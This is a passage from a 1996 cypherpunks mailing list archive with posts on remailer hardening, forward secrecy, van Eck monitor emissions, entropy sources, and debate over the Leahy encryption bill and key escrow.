This doesn't solve the whole problem of stealth; you still know that
what you have is a PGP message, and even that it is an encrypted
message, but you do not know to whom it has been encrypted.  The nice
thing about this approach is that this works for multiple recipients,
too!

NOTE: while the PGP3 API should be able to handle this case, I do not
know if support for this feature will be implemented in PGP 3.0

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Thu, 14 Mar 1996 10:28:50 +0800
To: cypherpunks@toad.com
Subject: Re: Remailer passphrases
In-Reply-To: <199603122030.PAA05252@jekyll.piermont.com>
Message-ID: <199603131713.LAA00824@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


If we ignore the obvious problem (ie., no one is going to put much effort
or expense into running a free remailer), wouldn't splitting the remailer
across two machines help fix the security problem? 

Suppose one unix box accepts the mail and puts it a queue directory.  Then
a second box periodically grabs files from the first box's queue with ssh
(the second box initiates the connection), processes them, and then passes
them out to the smtp server on the first box.  The second box doesn't
accept incoming connections on any port except for the ssh port so there
are no sendmails or httpds to hack.

The remailer files could be running on a cfs drive (with nfs/cfs only
accepting connects from localhost), and you could disable getty so that it
would be hard to physically grab the machine and read the contents of the
disk.  If you had enough ram you wouldn't need a swap file, so there'd be
nothing there for someone who grabbed the machine.  If you set the machine
up while it's plugged into a small lan that's not connected to the net no
one could come in and hide something before you had secured everything. 

You'd also have to try to make as sure as is humanly possible that there
is no way an attacker can construct a trojan remailer packet that would do
something unpleasant.

Finally, don't tell anyone what you're doing or how you're doing it, and
don't post about it to cypherpunks.  It may be unwise to depend on
obscurity for security, but as an extra layer it can't hurt and it might
cause a physcial attacker to come unprepared to hack the machine without 
powering it down and rebooting.

I know an attacker could interrupt service, and I'd guess that a skillful
attacker could probably find a way to grab the cfs and remailer
passphrases if he could grab the machine and the control the site
physically (to work on it while it's running) for awhile, but how would an
attacker come in over the net and hack the remailer box?  

What have I overlooked? 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: panzer@dhp.com (Matt 'Panzer Boy')
Date: Thu, 14 Mar 1996 10:51:46 +0800
To: cypherpunks@toad.com
Subject: Re: all.net
In-Reply-To: <199603130606.WAA08192@hammerhead.com>
Message-ID: <4i6ues$9rf@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


More ALL.NET spew, hit D now if you don't care.

A user of system, or something triggered the initial email to our
postmaster account here at DHP.  I replied with a rewording of the
message, as seen below.  This resulted in Fred Cohen deciding that I was
part a huge consipiracy to invade his computer system and decided that
CERT needed to get in on the mailings.  Based on the services available
via ALL.NET's web page, I find this quite funny, so I replied to both CERT
and his provider, PSI.  Please be sure to check out the provided URL's 
available at ALL.NET.

My included response to CERT and , including all previous email in quoted 
form.

 -Matt     (panzer@dhp.com)                         DI-1-9026
 "That which can never be enforced should not be prohibited."
 
-----------------------------------------Cut Here or hit D Now-------------
>From panzer@dhp.comWed Mar 13 11:50:26 1996
Date: Mon, 11 Mar 1996 02:35:24 -0500 (EST)
From: Matt 'Panzer Boy' <panzer@dhp.com>
To: cert@cert.org, postmaster@psi.net
Cc: postmaster@all.net, admin@dhp.com
Subject: Re: Attempted-entry-in.telnetd-by-unknown@dhp.com (fwd)

This administrator at all.net (I assume the whois information is true) is 
making unwarrented threats and accusations.  These threats and warnings 
coming from a site that offers to do port scans on any host via a web 
interface is quite absurd.
References:
 "http://all.net/tests/testsuite.html" For a description of what they do
 "http://all.net/tests/one-time-test.html" To actually try it out

 -Matt     (panzer@dhp.com)                         DI-1-9026

---------- Forwarded message ----------
Date: Sat, 9 Mar 1996 16:16:33 -0500 (EST)
From: Fred Cohen <fc@all.net>
To: cert@cert.org
Cc: panzer@dhp.com
Subject: Re: Attempted-entry-in.telnetd-by-unknown@dhp.com (fwd)

The systems administrator at the following site is apparently a party to
the attmpted entry to our site reported below.  What is the procedure for
contacting federal authorities to investigate attempted breakins to
Federal Interest Computers?

Forwarded message:
> From admin@dhp.com Sat Mar  9 16:11:03 1996
> Date: Sat, 9 Mar 1996 16:11:57 -0500 (EST)
> From: DHP Administrator <admin@dhp.com>
> To: root <root@all.net>
> Subject: Re: Attempted-entry-in.telnetd-by-unknown@dhp.com
> In-Reply-To: <9603090948.AA25300@all.net>
> Message-Id: <Pine.LNX.3.91.960309155116.9846A-100000@dhp.com>
> Mime-Version: 1.0
> Content-Type: TEXT/PLAIN; charset=US-ASCII
> 
> On Sat, 9 Mar 1996, root wrote:
> > A user at your site has just attempted to telnet into our site without
> > proper authorization.  We consider this inappropriate behavior and would
> > like an explanation of this action as soon as possible. 
> > 
> > This message is generated automatically at the time of the attempted
> > entry and is sent to our administrators and the postmaster at the
> > machine making the attempt.  We have included any information provided
> > by your ident daemon (if in use) on the subject line of this message. 
> > We also do a reverse finger for future reference. 
> > 
> > Fred Cohen - fc@all.net - tel:US+216-686-0090
> 
> A user at your site has just attempted to finger into our site without 
> proper authorization.  We consider this inappropriate behavior and would 
> like an explanation of this action as soon as possible.
> 
> Please refrain from such a waste of bandwidth in the future.  Setting 
> alarms off with a telnet is both stupid, and most likely to get people in 
> trouble for no proper reason.
> 
>  -Matt (panzer@dhp.com)
> 
> 
> 
> 
> 
> 

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236





-- 
 -Matt     (panzer@dhp.com)                         DI-1-9026
 "That which can never be enforced should not be prohibited."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 14 Mar 1996 08:46:57 -0500
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Remailer passphrases
In-Reply-To: <199603130737.XAA22807@ix15.ix.netcom.com>
Message-ID: <199603131656.LAA00295@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart writes:
> perry@piermont.com replied
> >Signed Diffie-Hellman key exchanges have the property known as
> >"Perfect Forward Secrecy". Even if the opponent gets your public keys
> >it still will not decrypt any traffic for him at all -- it just lets
> >him pretend to be you. Thats one reason why protocols like Photuris
> >and Oakley use the technique.
> 
> DH key exchange is really only Exponentially Good Forward Secrecy,
> and in its primary use (exchanging keys for symmetric-key algorithms)
> the system is at best Good Enough Forward Secrecy.

No, signed D-H like STS is in fact perfect forward secrecy in the
sense that breaking the RSA keys gives you no information about the
session keys, and breaking one of the D-H exchanges does not (in
theory) give you any information about any of the others.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 16 Mar 1996 19:44:06 +0800
To: cypherpunks@toad.com
Subject: BES_ieg
Message-ID: <199603131716.MAA20090@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Architectural Record reports in the March issue on
   "Building Security: Coping With Threats From Bombs to
   Break-Ins."

   It shows the parallels of designing to protect vulnerable
   buildings and the hapless computer systems inside them.

   It reviews current approaches for "crime prevention through
   environmental design (CPTED)." And offers a cypherpunkish
   outlaw-and-disorder survey of besieged corporatism:

      For Which of the Following Does Your Organization Have
      Response Plans?

      Employee theft                           90%
      Bomb threats                             85%
      Fraud                                    80%
      Employees bringing weapons to work       79%
      Fights among employees                   76%
      Robberies                                75%
      Threatening phone calls                  72%
      Verbal threats from employees            69%
      Employee sabotage                        65%
      Murder threats                           60%
      Civil unrest                             53%


   BES_ieg






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 14 Mar 1996 06:50:55 +0800
To: cypherpunks@toad.com
Subject: Re: Beat Remote Monitor Snooping?
Message-ID: <ad6c6026030210047e25@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:31 AM 3/13/96, JonWienke@aol.com wrote:
>I know that monitors emit RF signals that can be detected and decoded for a
>considerable distance.  I have a question about this.  Obviously, the
>difference between black and white (white text on black background, or vice
>versa) would be the most detectable, because the difference in signal levels
>would be the greatest.  Would it be possible to reduce or prevent this kind
>of snooping by using color schemes that all use the same signal levels?  For
>example, the color purple uses the red and blue color guns, and yellow uses
>the red and green color guns.  Would purple text on a yellow background be
>able to be read by a remote snooper?  If not, then perhaps these color
>schemes could be used to echo pass phrases--assuming the user isn't worried
>about someone looking over their shoulder.  Any comments?

I encourage you or anyone else to do experiments on RF emissions (so-called
van Eck radiation).

I'm not being catty. If I had my old lab at Intel I'd surely answer this
question for myself by doing some experiments. (As it is, it may be
possible to do some reasonable experiments just with t.v.s tuned to pick up
the emissions, radios tuned in, etc.).

Some of you out there may actually have hands-on expertise, as opposed to
first principles academic views. If so, you aren't speaking up.

So, a good opportunity for one of you to become an actual expert in van Eck
emissions, and the real or imagined risks of keyboard/CRT snooping from
afar.

(Personally, I'm not too worried. Easier ways to crack my security. Echoing
a passphrase on a CRT is not really needed, and I'm not sure
reasonably-available van Eck monitoring equipment can pick up keyboard-only
signals. Again, some experiments would be useful.)

If this actually is a real threat (and bear in mind there's a limit to how
many vans can be positioned...), then of course some fixes are possible:
use LCDs (where the RF emissions are orders of magnitude lower), use
visual-metaphor passphrase selection (e.g., where one clicks on letters
displayed on a color raster...unlikely that a monitor van can distinguish
the region selected unless it can monitor the mouse signals), and so on.

For the academic/theoretical point of view, Alta Vista shows a bunch of
hits on "van Eck" (or "Van Eck"), including our own Cypherpunks archives.
Also, some Usenet articles in sci.electronics, etc.

But someone actually reporting to us what they've found with modern systems
would be more interesting than rehashes of the old papers.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Thu, 14 Mar 1996 06:55:53 +0800
To: cypherpunks@toad.com
Subject: Re: Multiple spinners as sources of entropy?
Message-ID: <960313131931_245051343@mail06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-03-13 02:04:12 EST, you write:

>Practically there may be less entropy from a couple of bits than from 
>several bits. I've done tests with keyboard sampling on DOS machines. 
>Especially when I've tried setting the system clock to a higher rate. 
>In one case the samples were 3/4 of the time even.
>
>It seems better to estimate the entropy based on how-often samples 
>occur (akin to arithmetic compression, only we're just counting bits) 
>and output hashed data.
>
>Of course, if the raw samples are predictable enough, that *is* a 
>problem.  Depending on the source, how does one test if a method is 
>"truly" random?
>
>BTW, fast timing measurements from disk access seem to be pretty 
>good...

Another thing to try is to take the low-order byte of 2 timer readings based
on keystrokes (check the timer value when the key is pressed), flip one
around (so bit 0 is exchanged with bit 7, bit 1  is exchanged with bit 6,
etc.) and then XOR them together.  This will minimize the skew of any
individual bit.

You could do this with sound card samples as well.  Input noise into your
sound card (seperate noise sources for the left and right channels) and take
16-bit samples.  Take the low-order bytes of the left and right samples, flip
one around, and XOR them together.  Should be extremely random.

For a cheap noise source, use 2 Walkmans, each tuned to a different FM
station gap.  Connect them to the line inputs of the sound card, and adjust
the volume so they are almost, but not quite clipping.

Whatever method is used, running the data through a good hash function breaks
up any patterns even more.  I am working on an RC4 mutation that allows
random input and output to be processed continuously.  It stores the S-box
and the counters I and J in static variables that are preserved between
calls, and uses a status parameter to determine whether to output a byte or
input one.  Email me if interested in details.

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com (James A. Donald)
Date: Thu, 14 Mar 1996 11:32:22 +0800
To: cypherpunks@toad.com
Subject: Re: Leahy bill, legalize crypto
In-Reply-To: <Do5826.46@cruzio.com>
Message-ID: <199603131442.GAA29487@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


schlafly@bbs.cruzio.com wrote:
> Obstruction of justice is already a crime.  Why add penalties for
> using encryption?  Intimidate crypto users?  Discourage use of
> encryption?  Give the feds jurisdiction over crypto matters?

There are several different interpretations of the most controversial
sections of the bill, it is vague and ambiguous.  The only
interpretation that I have seen that gives effect to the stated
purposes of the bill is that if a cop is investigating a felony, he
can demand your secret key, and if you refuse to give it to him, you
get five years for obstruction.   If the objectionable parts mean
anything at all, they must *widen* the already alarmingly broad
concept of "obstruction of justice".

That is to say, of the many possible interpretations of this section,
the only one that gives effect to the stated purposes of this
legislation, delegates judicial powers to cops.

> I see nothing good in this bill, except the export rule relaxation.

This bill is a net loss:  It gives the software companies considerably
less than they thought they were getting, and violates the rights of
individuals.

The best bill we can hope to obtain is no bill at all.  Crypto is
profoundly harmful to the vested interest of Washington, and the more
attention they pay to it the worse we will be:  Any bill that
Washington could pass is a bad bill.  Any attempt to fix this bill is
likely to make it worse.





>
>Roger

 ---------------------------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.

http://www.jim.com/jamesd/      James A. Donald       jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 14 Mar 1996 07:54:59 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Leahy bill nightmare scenario?
In-Reply-To: <m0twYl5-00090jC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960313144443.8242A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Mar 1996, jim bell wrote:

> At 09:09 PM 3/11/96 -0800, Timothy C. May wrote:
> 
> >Yes, I read Junger's analysis. A nice analysis. What does this have to do
> >with the points I was making? I'm a government stooge, to use your terms,
> >because of my points about hotel rooms?
> 
> Fortunately for me, Tim, and unfortunately for you, a friend of mine visited 
> me last night, an ex-cop who is now a cabbie (he left the force due to an 
> accident, slipping on glare ice chasing a "perp", which caused an inoperable 
> back injury).  Being a cabbie (in the same town he was a cop), and very 
> familiar with the "drug" and "prostitute" sections of town, I asked him 
> whether or not he was aware of a hotel or motel ever being siezed by the 
> govt. for "tolerating" drugs and/or prostitution.
> 
> His reply was that as we speak, he knows exactly where a motel has been 
> closed, locked up, and BARRICADED with _city_ signs and POLICE TAPE (you 
> know the kind, "Police line:  Do not cross.").  We're not talking of a 
> bankrupty, or a voluntary shutdown, either.  His understanding was that this 
> was on the news a while back.  Would you like the name and address?  I 
> didn't ask him for it, but I'm sure he'll be driving by it again 
> within the next week or so.

This is getting out of hand.

There's a distinct difference between tolerating prostitution and 
actively supporting it.

Your example lacks facts (as usual) which I'm sure you will fill in at 
your next opportunity with a load of dung you pull out of the air.

In the event a hotel knowingly supported prostitution, charged by the 
hour only to prostitutes, paid off police to avoid their notice, was 
owned by those connected with the illegal enterprise of prostitution and 
otherwise supported an ongoing criminal enterprise actively and 
directly, of course it will be seized.  This, as far as I can tell, has 
almost nothing to do with Mr. May's example which proffered a passive 
role, a tacid understanding and looking the other way by the hotel 
management.  A judge who upheld such a seziure would be asked, probably 
less politely than my last example, to leave the bench.  That a hotel is 
being seized, absent any showing of reason or circumstance, has so little 
to do with this point as to be amusing.  I cannot say, however, that I am 
surprised.

If there is enough interest, outside of you Mr. Bell, I will post a 
summary of asset forfeiture requirements under RICO and common law to the 
list.

Mr. Bell, your chronic out of context examples, stuffing of words into 
other peoples mouths (or posts), ignorance, and flatulant expositions 
have easily qualified you, in my book, as the most annoying and useless 
poster on the list.

> I accept your anticipated apology, Tim.

I have a feeling, not to speak for Mr. May, that you have a long wait.

> Jim Bell
> jimbell@pacifier.com

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com (James A. Donald)
Date: Thu, 14 Mar 1996 10:43:49 +0800
To: cypherpunks@toad.com
Subject: Re: Leahy bill, legalize crypto
In-Reply-To: <Do5826.46@cruzio.com>
Message-ID: <199603131524.HAA22538@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


schlafly@bbs.cruzio.com sez:
> > It would be nice if the bill put in some user protections, such as
> > requiring notification of the user if the escrow agent divulges his
> > key, but it does not.
>          ^^^^^^^^^^^

eck@panix.com (Mark Eckenwiler) wrote:
>False.  See, for instance, proposed section 2802(c)(3)(C).

What copy of the Bill are you reading, Mark?  My copy says that
escrowed keys must be given to the government secretly on demand, NO
WARRANT NEEDED, and the fact that they were given MUST BE KEPT SECRET.

This bill is a small but significant step towards the police state.
If the bill becomes law, no one in their right mind will "voluntarily"
escrow their keys, and then we shall see steadily increasing
compulsion to "voluntarily" escrow keys, like the "voluntary" self
assessment of income tax.

Section 2802(c)
>  "(c) REQUIREMENTS FOR RELEASE OF DECRYPTION KEY TO 
>       INVESTIGATIVE; OR LAW ENFORCEMENT OFFICER.-
>
>   "(1) CONTENTS OF WIRE AND ELECTRONIC COMMUNICATIONS.-
>   A key holder is authorized to release a decryption key 
>   or provide decryption assistance to an investigative or 
>   law enforcement officer authorized by law to conduct 
>   electronic surveillance under chapter 119, only if-
>   [...] or "(ii) a certification in writing by a person 
>   specified in section 2518(7) [...] stating that- "(I) 
>   no warrant or court order is required by law;
>   [...]
>    "(4) NONDISCLOSURE OF RELEASE.-No key holder, officer, employee, or
>   agent thereof shall disclose the key release or provision of
>   decryption assistance pursuant to subsection (b), except as may
>   otherwise be required by legal process and then only after 
>   prior notification to the Attorney General or to the principal 
>   prosecuting attorney of a State or any political subdivision of 
>   a State, as may be appropriate.

Section 2802(c)(3)(C) is worthless piety.

Every time I come back to this bill it looks more and more repressive.

Section 2802(c)(3)(C) reads:

>  "(C) The inventory required to be served pursuant to section
>   2518(8)(d) on persons named in the order or the application under
>   section 2518(7)(b), and such other parties to intercepted
>   communications as the judge may determine, in the interest of
>   justice, shall, in the event that encrypted wire or electronic
>   communications were intercepted, include notice of the fact that
>   during the period of the order or extensions thereof a key to, or
>   decryption assistance for, any encrypted wire or electronic
>   communications of the person or party intercepted was or was not
>   provided by a key holder.

If you chase 2802(c)(3)(C) to its end, you will find that it means
stuff all, like most of the other supposedly freedom protecting
provisions in this act.

Any crypto bill that we could realistically get out of Washington will
substantially reduce liberty.  The best that we can hope for is for
Washington to forget about crypto until it is too late to stop.
 ---------------------------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.

http://www.jim.com/jamesd/      James A. Donald       jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 15 Mar 1996 13:56:25 +0800
To: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Subject: Re: Why escrow? (was Re: How would Leahy bill affect crypto
Message-ID: <m0twzwP-0008zgC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:15 PM 3/13/96 +0000, Deranged Mutant wrote:

>Since when is the government intentionally going to let any bill or 
>policy go through that isn't friendly to themselves??? (You don't 
>have to be an anarchist to figure that out!)

Well, it's not surprising, of course, but it DOES seem to be making these 
assumptions.  I wonder what they're gonna do when they start 
discovering that "all" voluntary escrow system in place have protections far 
beyond what they've anticipated?  That's why I'm more than a little 
disturbed about the one really bad portion of the Leahy bill:  The one that 
makes using encryption to thwart an investigation a crime.  As Mr. Junger 
observed, and as should be obvious to most of the rest of us, such a section 
of the bill could turn a key-escrow holder into a criminal if he fails to 
disclose an encryption system that protects a key, or (worse!) even if he 
structures his business in such a way as to avoid having the decrypt key for 
the escrowed key at all.  Previously, legally, he could probably have 
claimed innocence because he had no decrypt-key to disclose, but Leahy's 
bill would make him guilty even if there was nothing he could do to give 
them a key.  

>Nothing is safe from abuse, by the goverment or non-government fols 
>alike.  There's always more loopholes to clean up.   (Not that this 
>means we shouldn't clean them up... obviously bad policies should be 
>fixed...). Just as no crypto is 100% foolproof, no legal system is 
>100% abuse-proof.

If I were trying to detect government investigation in such a situation, I 
would buy a crypto phone, open an "escrow account" on a totally voluntary 
basis, give them a phony key, and then (as part of the (presumably?) 
enforceable escrow agreement) insist that they inform me if anybody asks for 
the key.  There is nothing in Leahy's bill which appears to prohibit the 
escrow agent from informing the key holder of a request/demand for the key; 
(I would greatly prefer if that was an actual legal requirement that they do 
inform the key user.)  The question is, is this merely an oversight on their 
part, or are they planning something, or are they assuming an existing law 
would cover his?  The answer doesn't look good.

Jim Bell
jim bell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 14 Mar 1996 19:36:11 -0500
To: jim bell <jimbell@pacifier.com>
Subject: [Noise] Jim Bell: Legal Reformer
In-Reply-To: <m0twu6i-000932C@pacifier.com>
Message-ID: <Pine.SUN.3.91.960313145952.8242C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Mar 1996, jim bell wrote:

> At 11:37 PM 3/12/96 -0800, Bill Stewart wrote:
> >At 05:40 PM 3/12/96 -0500, Black Unicorn wrote:
> >>Revise your statement to:
> >>"doesn't want anyone who hasn't spent a few years in law school to pass 
> >>judgement on pending legislation and the effect of supreme court decision 
> >>thereon..."
> >>and you'd be right on the money.
> >
> >I'm not a lawyer, though I've played a politician on TV.  I'll grant you
> >that lawyers and other trained legal professionals can do a far better
> >job of finding and analyzing cases than amateurs like myself, though 
> >I suspect a month or two's experience with Lexis would be enough to 
> >let many of "the rest of us" outsearch the average lawyer of 50 years ago
> >who had to rely on his or her wits alone.  But if the average intellegent
> >person _can't_ evaluate a law and have a reasonable chance of figuring
> >out what it says and what it means, there's something seriously wrong
> >with the way new laws are written, as well as enforced.

This I never denied.  I agree with Mr. Stewart, it's unfortunate that the 
law is so complex sometimes.  Unfortunate also is the fact that there is no 
solution.  "Thou shall not kill,"  while simple in concept, and generally 
understood, lacks specificty.  Kill what?  Do animals count? Define kill?  
Does self defense apply?  What about suicide?  Is the self included in 
the realm of those not to be killed?  (Incidently, the common 
understanding is incorrect in any event, the closer translation is "Thou 
shall not commit Murder.")

As legal jurisprudence moved from legal formalism (apply the letter of 
the law, and only the letter of the law, and damn the result, even if 
unjust or beyond the intention of the legislature) moved into legal 
realism, and progressive legal thought, it became more and more difficult 
to predict what the results of litigation might be.  This is because 
judges were no longer, at least to the extent they were in the early 19th 
and late 18th centuries, simple clerks who read the law and enforced it, 
but rather individuals who intrepreted the intent of the law makers, and 
applied the law with a mind to avoiding injustice.

The "Seal" is a classic example.  At one point, if your name was on a 
contract, that was it, you were bound by it.  Seems ideal in some ways, 
but what if you were intoxicated, or couldn't read?  What if you were 
told that the contract was a lease, and only after signing it did you 
discover it was a contract for your endentured servitude?

Legal formalism says:

"Is this your name here?"
"Yes, but-"
"Judgement for the plaintiff."

Well now.  How do you write a law that expresses the will of the 
lawmakers on a complex subject with the added twist of judicial 
intrepretation?  Judges are people too.  Some judges look at the 
congressional record to see what it was congress was trying to do 
exactly, some believe legislative history is a bunch of hooey.  Mr. Bell, 
apparently, thinks he can do a better job.  I'd like to seem him try.

I don't want to be an apologist for attorneys, I have a lot of problems 
with the legal profession in general.  This doesn't change the fact that 
not everyone on the planet can read a bill and a complicated supreme 
court decision and apply them together to an entirely unrelated area.  In 
fact, most lawyers will have problems too.  If not, then there would 
never be court cases.  The parties to litigation would already know the 
outcome, and fighting it would be pointless.  Do you really think this is 
ever going to happen?

Someone with almost no legal experience, on the other hand, is simply out of 
their league.  Mr. Bell, this means you.  I'm sorry we can't all run like 
Carl Lewis, I know that would be a perfect world, well in some people's 
view anyhow.  But this kind of finger pointing, and name calling, and 
cries of "elitist" it begins to look like the kind of left-speak that 
argues that everyone has the same potential in life.  Mr. Bell's opinion 
aside, (I already know what he thinks) I'd have to be an idiot to go to 
law school for 3 years plus post grad work and still come out knowing no 
more than someone who looks at lexis a lot.  Sorry, if that makes me 
elitist, so be it.  (I happen to be elitist for other reasons, but that's 
beside the point).

Can the average person read a criminal statute and tell how old a sexual 
partner has to be to avoid statuatory rape charges in their state?  
Sure.  That's easy.  That part of the law is fairly available.  Now take 
the same person and ask them what the supreme court case ruling that 
parents can sue a man for "corruption of a child" (taking her viginity) 
even after the pair is legally married means in their specific case.  Not 
so easy anymore.

Point being, it's easier to look at criminal law and decide what it is 
you are not supposed to do (because such statutes are fairly specific 
about the conduct they are trying to restrict, and need very little 
complexity) than it is to apply complex regulatory statutes to asset 
seizure cases and entirely distinct fields.  Mr. Bell seems to think that 
because he knows when he will get a parking ticket, he's qualified to 
render his legal opinions to the list as if they were gospel, and no one 
is entitled to question his qualifications.

> Well said.  If more people lambasted this "Black Unicorn"

That's Mr. Black Unicorn to you.

> fellow for his 
> legal-elitist ways, he'd actually be forced to either shut up or use 
> reasoned argument to support his odd position.

1) You wouldn't know reasoned argument if it bit you on the ass.
2) My position (Which I am assuming you are even intrepreting correctly) 
is hardly odd or uncommon.  I would say it's fairly common knowledge that 
you will be in better shape if you e.g. hire a lawyer to do your will 
than if you do it alone.  I would say you'd have to be an idiot to even 
try to represent yourself in the most simple criminal case for assault.

> Laws, as I understand it, used to be written so that ordinary people could 
> understand them.

And thus were patently inflexible.  That's legal formalism.  I might add 
that laws were not always so written.  Nero posted all the laws 
publically, and wrote them clearly.  At the same time, he posted them at 
the top of the columns in the senate, so no one could read them.  Writing 
law so it's accessible to the common man is not an easy thing.  One could 
easily make the arguement that laws were never accessible in that way, 
Mr. Bell's unsupported assertion aside.

> That's the way it ought to be today,

See my contract example above as to why this is complete ignorance and 
shortsightedness.

> but isn't, precisely 
> because the elitists have had their way for so long.

Simplicty and fair law simply do not go together.  If the elitists have 
had their way for so long, perhaps you should look to the electorate who 
continually sends them to the capitol.  I might add that I have never 
seen simple legislation in the way that you mean it from the law makers that 
have never even been to law school either.  (There are plenty of them too).

> There used to be a 
> saying, "Ignorance of the law is no excuse."  The presumption was that you 
> had a responsibility to know what the law said, and that most people could 
> understand what it said, and if you didn't take the time to know it you were 
> guilty despite this.  Today, that saying is laughably out of date:  When 
> people like "Black Unicorn" claim that ordinary people haven't the skills to 
> evaluate any law or proposed law, it is obvious that he and his ilk is a 
> major portion of the problem. 

I don't believe this is obvious at all.  First, what does my 
acknowledgement of the complexity of law, and the need for a profession 
to intrepret it have to do with my contribution of the problem?


Second, you say:

> Laws, as I understand it, used to be written so that ordinary people could
> understand them.  That's the way it ought to be today.

Forgive me, Mr. Bell, but isn't this exactly what you are accusing me 
of saying?  "Ordinary people can't understand the law," is your point, 
yes?  Why then aren't you part of the problem?

Or is it just when ">people like "Black Unicorn" claim that ordinary 
people [can't understand the law]" that there is a problem?  Your entire 
point hinges on your personal dislike of either me, or lawyers, as you 
have said exactly the same thing I have said all along.  Law is so 
complicated, you need a lawyer to figure it out.  Funny, that's precisely 
what I was trying to get at in telling you to stop posting to the list 
your ravings about Supreme Court cases because you had no idea what you 
were talking about.  Seems you've conceeded my point.  I may be elitist, 
but even you, in your own words, admit that my ilk is necessary.

> >(I suppose I've complained enough that there _is_ something
> >seriously wrong them that I'm not adding any new weight here;
> >if the author of a portion of a law can get up on the Senate floor
> >and say that he realizes that part of the law he's proposed is
> >unconstitutional and unenforceable, and that this doesn't bother him*,
> >I guess it's no surprise that one of the more-or-less "good guys"
> >in the Senate can propose a law so ambiguously worded that it
> >looks good on the face until a good lawyer takes the time to rip
> >it apart - maybe Leahy will read some of Junger's review?)
> 
> The system is sick, perhaps irretrievably so.  Dr. Strangelove (in the movie 
> of the same name) stated that "deterrence is the art of making the enemy 
> FEAR to attack."  I think the main problem (and the most direct solution) to 
> the "politician-problem" in this country is to make government agents FEAR 
> to do the wrong thing.

I'm sure this has something to do with the point at hand.

> Jim Bell
> jimbell@pacifier.com

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Thu, 14 Mar 1996 19:32:51 -0500
To: jim bell <jimbell@pacifier.com>
Subject: Re: Why escrow? (was Re: How would Leahy bill affect crypto
Message-ID: <199603132123.QAA03328@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 13 Mar 96 at 9:41, jim bell wrote:
> Notice, however, how the government seems to be assuming that "key escrow" 
> (to the extent that it is implemented at all!) gets implemented in a way 
> which is "friendly" to government agents.  They assume that there is one key 

Since when is the government intentionally going to let any bill or 
policy go through that isn't friendly to themselves??? (You don't 
have to be an anarchist to figure that out!)

[..]
> Even the most limited planning could easily develop a system that achieves 
> all the benefits of escrow for the user, but is essentially impossible for 
> government agents (or for that matter, anyone else!) to use to the detriment 
> of the user.  

Nothing is safe from abuse, by the goverment or non-government fols 
alike.  There's always more loopholes to clean up.   (Not that this 
means we shouldn't clean them up... obviously bad policies should be 
fixed...). Just as no crypto is 100% foolproof, no legal system is 
100% abuse-proof.

 
Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 14 Mar 1996 08:52:41 -0500
To: cypherpunks@toad.com
Subject: The Leahy Bill is Rancid Sausage
